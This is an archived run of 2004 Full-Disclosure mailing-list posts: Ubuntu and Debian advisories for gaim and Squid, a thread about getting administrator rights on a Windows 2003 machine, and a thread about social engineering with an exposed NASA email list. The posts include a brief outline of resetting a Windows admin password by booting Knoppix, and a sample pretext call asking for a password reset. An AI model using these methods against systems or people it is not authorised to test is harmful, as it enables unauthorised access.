> throughout the firm because the twits who put it in didn't believe in
> IP access lists.
>
> On Thu, 28 Oct 2004 13:22:41 -0400, valdis.kletnieksvt.edu
>
>
> <valdis.kletnieksvt.edu> wrote:
> > On Thu, 28 Oct 2004 16:49:44 +0200, Honza Vlach said:
> > >
> > > --9Ek0hoCL9XbhcSqy
> > > Content-Type: text/plain; charset=iso-8859-2
> > > Content-Disposition: inline
> > > Content-Transfer-Encoding: quoted-printable
> > >
> > > > use knoppix to boot from, mount the ntfs filesystem, and search the net for
> > > > which keys in registry you have to change. there may be other files too that
> > > > you have to change
> > > > there even are special bootcd's that are made only for the purpose of changing
> > > > the admin pass etc...
> > >
> > > I thought that real blackhats don't teach lamers who can't even do their
> > > homework properly =^)
> >
> > The part that nobody's going to tell him:
> >
> > 1) It's *easy* to whomp a server with a Knoppix boot if you have physical access.
> >
> > 2) It's *HARD* to do so without anybody noticing that the server is down and
> > you're sitting there in front of it, typing away as fast as you can. And even
> > the most midget-brained user can figure out that if the server is down, and
> > you're still typing, and you're *not* the sysadmin, you probably have something
> > to do with why it's down...
> >
> > :)
> >
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Anders Langworthy (hadespsilanthropy.org)
Date: Thu Oct 28 2004 - 17:40:07 CDT

> Somehow, I get the feeling that the original poster's site will discover
> KVM switches around 2008 or so. ;)

That's exactly my point. I don't necessarily approve of this list being
used to help clueless script kiddies r00t systems, but the information
needed to accomplish that feat is *identical* to the the information
needed by clueless sysadmins to prevent against it.

What if I had been the original poster, and had phrased my question from
the standpoint of a system administrator requesting help in hardening a
Windows 2003 server that has to be physically accessible? Would you
have "seen through my ploy" and not helped me?

This list is about helping people who are interested in computer
security get *better* at computer security. I don't see how we can
maintain that double standard without causing more harm than good.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-8-1] gaim vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:53:22 CDT

===========================================================
Ubuntu Security Notice USN-8-1 October 27, 2004
gaim vulnerabilities
CAN-2004-0891
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gaim

The problem can be corrected by upgrading the affected package to
version 1:1.0.0-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

A buffer overflow and two remote crashes were recently discovered in
gaim's MSN protocol handler. An attacker could potentially execute
arbitrary code with the user's privileges by crafting and sending a
particular MSN message.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.diff.gz
      Size/MD5: 40716 a1cd244a1d9197c9a4855706f857ede2
    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.dsc
      Size/MD5: 853 dbd5a82e0fa2c33df8fc26d636a2f9f1
    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0.orig.tar.gz
      Size/MD5: 6985979 7dde686aace751a49dce734fd0cb7ace

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_amd64.deb
      Size/MD5: 3443672 0a2a22b071c0256a2d68d20b474fdddc

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_i386.deb
      Size/MD5: 3353616 1b825ce8a2cbba5fa2171fa089f71112

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_powerpc.deb
      Size/MD5: 3417684 bae36e86bcf49722af6497d55a2de5fc

This email and any files transmitted with it are intended for the named recipient only. The information contained in this message may be confidential, legally privileged or commercially sensitive. If you are not the intended recipient you must not reproduce or distribute any part of the email, disclose its contents to any other party, or take any action in reliance on it. If you have received this email in error, please contact the sender immediately by return email and delete this message from your computer.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfvGCDecnbV4Fd/IRAr3eAJ9EkWwjOmcrhPFDxRCO+iB6Jj8sLQCgsQsa
xOYdKjDCqSd1EO9f+IfaT8Y=
=Bf36
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Heh...30 minutes of SSH login attempts...not the standard root an d user attempts either

From: James Lay (jlayameriben.com)
Date: Thu Oct 28 2004 - 20:52:37 CDT

Here it is....what an ass.....from Korea..doesn't suprise me ;)

http://www.slave-tothe-box.net/public/pubnet.txt

James Lay
Network Manager/Security Officer
AmeriBen Solutions/IEC Group
Semper Vigilans!!!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [SECURITY] [DSA 576-1] New Squid packages fix several vulnerabilities

debian-security-announcelists.debian.org
Date: Fri Oct 29 2004 - 00:41:12 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 576-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
October 29th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : squid
Vulnerability : several
Problem-Type : remote
Debian-specific: no
CVE ID : CVE-1999-0710 CAN-2004-0918
Debian Bug : 133131

Several security vulnerabilities have been discovered in Squid, the
internet object cache, the popular WWW proxy cache. The Common
Vulnerabilities and Exposures project identifies the following
problems:

CVE-1999-0710

    It is possible to bypass access lists and scan arbitrary hosts and
    ports in the network through cachemgr.cgi, which is installed by
    default. This update disables this feature and introduces a
    configuration file (/etc/squid/cachemgr.conf) to control
    this behavier.

CAN-2004-0918

    The asn_parse_header function (asn1.c) in the SNMP module for
    Squid allows remote attackers to cause a denial of service via
    certain SNMP packets with negative length fields that causes a
    memory allocation error.

For the stable distribution (woody) these problems have been fixed in
version 2.4.6-2woody4.

For the unstable distribution (sid) these problems have been fixed in
version 2.5.7-1.

We recommend that you upgrade your squid package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4.dsc
      Size/MD5 checksum: 612 ecf99211ec91dfb34bd6089ec9ae1b53
    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4.diff.gz
      Size/MD5 checksum: 226359 4e6ade338491ef8569035c4aecc855ef
    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6.orig.tar.gz
      Size/MD5 checksum: 1081920 59ce2c58da189626d77e27b9702ca228

  Alpha architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_alpha.deb
      Size/MD5 checksum: 814832 cca13d30e0f1f8910a07fa5ab70c861e
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_alpha.deb
      Size/MD5 checksum: 75250 421fd4ee596d4c9993ba5f8778eaef2f
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_alpha.deb
      Size/MD5 checksum: 59996 62c1544bce8c872e6c1b3fdce5e94475

  ARM architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_arm.deb
      Size/MD5 checksum: 724816 e2076225318e14b3c8bff10a40cdf7f9
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_arm.deb
      Size/MD5 checksum: 73026 4bc2cc0d5d0d29992ffd1b9a82653e21
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_arm.deb
      Size/MD5 checksum: 58332 408e227f29d0aa923044beedc3e7c92e

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_i386.deb
      Size/MD5 checksum: 684008 0a09e40e20659cebdbab638f1cbc009b
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_i386.deb
      Size/MD5 checksum: 72762 9e32b4f77446d9172b381f52f18a11eb
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_i386.deb
      Size/MD5 checksum: 57912 5b8e0c713676845dc5a7263a44dd56cd

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_ia64.deb
      Size/MD5 checksum: 952836 db5e0a6fc0863bdebbf579f957121da6
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_ia64.deb
      Size/MD5 checksum: 79144 7b9eb001137d25be30d9b8400d6aee39
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_ia64.deb
      Size/MD5 checksum: 62682 af3f6bdb3de9bdae20896f630eeb4b60

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_hppa.deb
      Size/MD5 checksum: 778974 59f67088877baa7baf90e60a4f3317a6
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_hppa.deb
      Size/MD5 checksum: 74462 118f494f5079eda3ba1b52d1462f4012
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_hppa.deb
      Size/MD5 checksum: 59482 cbef83fb6fbb50ad47d318a821dc7358

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_m68k.deb
      Size/MD5 checksum: 665202 51cc52fe2a265c63cbaed727fad15a99
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_m68k.deb
      Size/MD5 checksum: 72378 07708d039b0cf46ee7c6628ad7e4bcbf
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_m68k.deb
      Size/MD5 checksum: 57584 5102473e069bac195482ed6385def788

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_mips.deb
      Size/MD5 checksum: 764682 62488f6104b371b6107b39b6b4bcaeda
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_mips.deb
      Size/MD5 checksum: 73928 14f1391ec0888964efebe1ba7a11f220
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_mips.deb
      Size/MD5 checksum: 58636 0123e6dba5c165033e3ce6dd60c8d89a

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_mipsel.deb
      Size/MD5 checksum: 764144 8cb8b84931df0d8b271e5c2f8a010fb2
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_mipsel.deb
      Size/MD5 checksum: 74030 ee3349da5a1634891ed67136c9989fc6
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_mipsel.deb
      Size/MD5 checksum: 58736 75c8d8c7d15b149f3c0a1bdccae59df8

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_powerpc.deb
      Size/MD5 checksum: 721856 283001554d7096f5ddc4126231ef6807
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_powerpc.deb
      Size/MD5 checksum: 73014 4a6e19209a8dd04cdc74e474abeb16e5
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_powerpc.deb
      Size/MD5 checksum: 58220 7424479351cd71563de79769b90911d1

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_s390.deb
      Size/MD5 checksum: 711276 8cab4b4e4a1f89b36aac29fc59613c91
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_s390.deb
      Size/MD5 checksum: 73348 d677789f48da35c39467674bc165065a
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_s390.deb
      Size/MD5 checksum: 58784 f8d217932f607b381a17b5f798e3352a

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody4_sparc.deb
      Size/MD5 checksum: 723958 41dce5c7e630c0b0ecedbed8acba2e7a
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody4_sparc.deb
      Size/MD5 checksum: 75644 f4af52384e6190450d5fc46ca3b66a82
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody4_sparc.deb
      Size/MD5 checksum: 60660 3a44a74fe3bcf2dd714f308cd4708a89

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBgdf3W5ql+IAeqTIRAuoiAKCPBpTgkA8EZSrCteAxeghkLpqFCACeL8iz
jy5uf0Bj98dyYZgxALs00PE=
=ygMY
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] why o why did NASA do this.

From: GuidoZ (uberguidozgmail.com)
Date: Fri Oct 29 2004 - 01:00:29 CDT

> Ok Mr. Limpy..lol

Just for the record, I fixed that problem I was having with my Linux
install! Of course, I've gone and broken it again, but that's besides
the point. Now you should be referring to me as Mr. No Limbs (it's
completely dead). lol

> Great point about the "career" job. Even if they aren't there, knowing a
> time and a name can get you more information out of a person in another
> dept, I think. I wouldn't try =)

I thought it was too. =D I wouldn't try it either, but then again, I'm
not someone who would be interested in hacking into NASA. It's the
ones who WOULD be interested that I worry about.

I realize that such information is generally available through public
records and such. However, that's no reason to post it all for easy
access and saving. ;)

--
Peace. ~G

On Tue, 19 Oct 2004 12:59:37 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
>
> GuidoZ wrote:
> > =) Yeah, I do. I wasn't sure if you were having a brain fart
> > or something. lol
> Ok Mr. Limpy..lol
>
> > Well said. It was finally removed from public view, though
> > I'd imagine quite a few saved it just in case (myself
> > included). No, it's not some perfect list for every malicious
> > purpose, though it's certainly better then nothing. Spammers
> > really don't care if it's active or not - they will still
> > sell it. Social Engineering can go a long way though. It's
> > entirely possible someone that worked at NASA in 1996 would
> > be there still today. It's called a career. =)
> Great point about the "career" job. Even if they aren't there, knowing a
> time and a name can get you more information out of a person in another
> dept, I think. I wouldn't try =)
>
> -Todd
>
> > --
> > Peace. ~G
> >
> >
> > On Tue, 19 Oct 2004 07:59:36 -0500, Todd Towles
> > <toddtowlesbrookshires.com> wrote:
> > > I meant this outdated NASA e-mail list. I undestand that FD
> > could be
> > > used for this purpose.
> > >
> > > The fact that NASA just hands you this information
> > (outdated or not)
> > > is pretty sad. As I stated before it is free information leakage at
> > > best and because it is outdated it should be removed from
> > public view.
> > > This could be used for social attacks and e-mail attacks. I don't
> > > think SPAMmers care about some 6 year old list but hackers
> > would. Any
> > > information that they can get free of charge is just that
> > much better.
> > >
> > > You know me better than that GuidoZ .....lol
> > >
> > > > -----Original Message-----
> > > > From: GuidoZ [mailto:uberguidozgmail.com]
> > > > Sent: Tuesday, October 19, 2004 1:24 AM
> > > > To: Todd Towles
> > > > Cc: full-disclosurelists.netsys.com
> > > > Subject: Re: [Full-Disclosure] why o why did NASA do this.
> > > >
> > > > > how would this list help me spam?
> > > >
> > > > Google your email address - then simply use a bot to
> > gather ALL the
> > > > email addresses listed in the posts along with it. ;) The
> > sad fact
> > > > is that the email addresses used to post to this list (and any
> > > > others like it) are freely there for the taking. Plus, it's quite
> > > > obvious they are active. (More obvious then, say, email
> > addies fro
> > > > 1996?) ;)
> > > >
> > > > --
> > > > Peace. ~G
> > > >
> > > >
> > > > On Mon, 18 Oct 2004 11:02:00 -0500, Todd Towles
> > > > <toddtowlesbrookshires.com> wrote:
> > > > > Exactly as I stated eariler...this is just information
> > > > leakage...old
> > > > > as it might be, it helps...the people on the list are just
> > > > doing their
> > > > > jobs...getting paid and giving information to a employee that
> > > > > knows their name (and is higher in the company) seems harmless.
> > > > Spam isn't
> > > > > the issue with this information leakage, I can buy a CD
> > > > with 6 million
> > > > > e-mail address on it...how would this list help me spam?
> > > > >
> > > > >
> > > > >
> > > > > > -----Original Message-----
> > > > > > From: full-disclosure-adminlists.netsys.com
> > > > > > [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> > > > > > KF_lists
> > > > > > Sent: Monday, October 18, 2004 9:06 AM
> > > > > > To: Harry de Grote
> > > > > > Cc: full-disclosurelists.netsys.com
> > > > > > Subject: Re: [Full-Disclosure] why o why did NASA do this.
> > > > > >
> > > > > >
> > > > > > Forget about the spammers, how about social engineers.
> > > > This is quite
> > > > > > the gold mine for that.
> > > > > >
> > > > > > Hi this is Joe Schmoe from building 69 I need to have my
> > > > > > password reset.
> > > > > > -KF
> > > > > >
> > > > > >
> > > > > > >
> > > > > > > i have to admit... it's pretty old and useless, but i think
> > > > > > this may
> > > > > > > be a nice place for spammers to try out some new adresses...
> > > > > > >
> > > > > >
> > > > > > _______________________________________________
> > > > > > Full-Disclosure - We believe in it.
> > > > > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > > > > >
> > > > >
> > > > > _______________________________________________
> > > > > Full-Disclosure - We believe in it.
> > > > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > > > >
> > > >
> > >
> >
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Thank you!

From: Nick (nickvirus-l.demon.co.uk)
Date: Fri Oct 29 2004 - 15:13:47 CDT